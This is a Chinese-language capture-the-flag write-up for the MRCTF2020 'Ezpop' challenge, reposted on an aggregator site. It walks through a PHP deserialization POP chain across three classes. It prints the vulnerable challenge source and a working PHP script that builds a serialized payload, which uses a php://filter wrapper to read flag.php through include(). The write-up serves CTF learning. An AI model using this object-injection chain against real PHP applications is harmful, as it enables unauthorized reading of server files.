[MRCTF2020]Ezpop

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[MRCTF2020]Ezpop相关的知识,希望对你有一定的参考价值。

[MRCTF2020]Ezpop

考点

反序列化、构造 POP 链

思路

1、__wakeup() 方法通过 preg_match() 将 $this->source 做字符串比较,如果 $this->source 是 Show 类,就调用了__toString() 方法;
2、__toString() 访问了 str 的 source 属性,str 是 Test 类,不存在 source 属性,就调用了 Test 类的__get() 魔术方法;
4、__get() 方法将 p 作为函数使用,p 实例化为 Modify 类,就调用了 Modifier 的__invoke() 方法;
5、__invoke() 调用了 append() 方法,包含 $value,若将 $value 为伪协议,则可读 flag.php 源码

Payload

index.php源码

<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\\.\\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

POP链:
pop链的开始是Show类,使用反序列化去触发__wakeup魔术方法,__wakeup触发__toString,然后访问不存在的source属性,触发Test类里的__get方法,__get再以访问函数的形式访问一个类去触发Modifier类里的__invoke方法,此方法再调用append函数,完成flag.php的读取

<?php
class Modifier{
	protected $var = "php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
	public $source;
	public $str;
	public function __construct($file){
		$this->source = $file;
	}
}
class Test{
	public $p;
	public function __construct(){
		$this->p = new Modifier();
	}
}

$a = new Show('a');
$a->str = new Test();
$H3rmesk1t = new Show($a);
echo urlencode(serialize($H3rmesk1t))."\\n";
?>

在这里插入图片描述

在这里插入图片描述

以上是关于[MRCTF2020]Ezpop的主要内容,如果未能解决你的问题,请参考以下文章

BUUCTF: [MRCTF2020]Ezpop

[MRCTF2020]Ezpop

[MRCTF2020]Ezpop

第六十一题——[MRCTF2020]Ezpop

MRCTF Ezpop简单的pop链构造

2020MRCTF